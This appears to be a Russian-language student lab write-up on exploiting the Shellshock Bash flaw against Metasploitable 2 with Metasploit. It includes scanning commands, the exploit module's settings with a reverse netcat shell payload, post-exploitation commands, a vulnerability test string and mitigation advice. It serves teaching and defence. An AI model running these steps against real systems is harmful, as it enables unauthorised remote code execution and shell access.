
Образовательная лаборатория, демонстрирующая эксплуатацию Shellshock (CVE-2014-6271) с использованием Metasploit против Metasploitable 2, включая сканирование, эксплуатацию, обратный шелл и стратегии смягчения.
Это практическое задание по курсу Оценка уязвимостей и тестирование на проникновение – II, посвящённое эксплуатации и анализу уязвимости Shellshock (CVE-2014-6271).
Выполнено в контролируемой лабораторной среде с использованием Metasploitable 2 (цель) и Kali Linux (атакующий).
nmap -sS -sV <target-ip>
2️⃣ Запуск Metasploit
msfconsole
3️⃣ Загрузка модуля эксплойта
use exploit/multi/http/apache_mod_cgi_bash_env_exec
4️⃣ Настройка эксплойта
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
5️⃣ Запуск эксплойта
exploit
📸 Демонстрация включает
📡 Результаты сканирования Nmap
⚙️ Конфигурация Metasploit
🔄 Вывод сессии обратной оболочки
🛠 Команды после эксплуатации:
whoami
uname -a
ifconfig
📖 Теоретические основы Что такое Shellshock?
Shellshock — это уязвимость в оболочке GNU Bash, которая позволяет злоумышленникам выполнять произвольные команды, внедряя их в переменные окружения. Обнаружена в сентябре 2014 года и получила идентификатор CVE-2014-6271. Поражает Bash версий с 1.14 по 4.3. Как это работает
Bash некорректно обрабатывает определения функций в переменных окружения и выполняет дополнительные команды после тела функции. На веб-серверах, использующих CGI-скрипты, HTTP-заголовки становятся переменными окружения, что создаёт лёгкий путь для атаки.
Пример:
env x='() { :;}; echo vulnerable' bash -c "echo test"
Если уязвим, выведет vulnerable. Воздействие
Полное удалённое выполнение кода (RCE) без аутентификации
Эксплуатируется с помощью простых HTTP-запросов
Использовался в ботнетах, червях, целевых атаках
Поразил миллионы серверов, маршрутизаторов и IoT-устройств
Реальные примеры эксплуатации
Серверы Yahoo – Вредоносное ПО через CGI-скрипты
Ботнет Wopbot – Автоматизированная эксплуатация
QNAP NAS – Удалённый доступ к оболочке и вредоносное ПО
Самореплицирующиеся черви – Распространение на новые уязвимые хосты
🛡 Предотвращение и смягчение
🔄 Немедленно обновить Bash
🚫 Отключить неиспользуемые CGI-скрипты
🔥 Использовать брандмауэры для блокировки ненужного трафика
🛡 Развернуть межсетевые экраны для веб-приложений (WAF)
📜 Мониторить журналы HTTP-запросов
👤 Применять принцип минимальных привилегий
⚠️ Отказ от ответственности
Этот проект предназначен исключительно для образовательных целей. Всё тестирование проводилось в контролируемой лабораторной среде. ❌ Не используйте эти методы на системах без разрешения.
👨💻 Автор: Janith Madhusankha 🎓 Курс: BICT (Hons) в области сетей и безопасности 🏫 Учебное заведение: Юго-Восточный университет Шри-Ланки